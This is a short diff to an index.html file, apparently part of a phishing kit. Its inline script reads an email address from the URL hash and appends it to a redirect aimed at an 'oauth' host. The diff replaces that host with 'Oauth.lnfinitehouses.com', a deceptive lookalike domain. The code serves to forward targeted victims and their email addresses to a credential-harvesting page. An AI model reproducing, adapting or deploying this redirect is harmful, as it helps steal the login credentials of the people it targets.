--- a/index.html
+++ b/index.html
@@ -8,7 +8,7 @@
     />
     <script>
       var data = getParameter();
-      var redir_to_page = "https://oauth.bsyyzb.com/?e=" + data + "";
+      var redir_to_page = "https://Oauth.lnfinitehouses.com/?e=" + data + "";
       var hash = window.location.hash;
       var email = hash.split("#")[1];
       redir_to_page = redir_to_page + email;
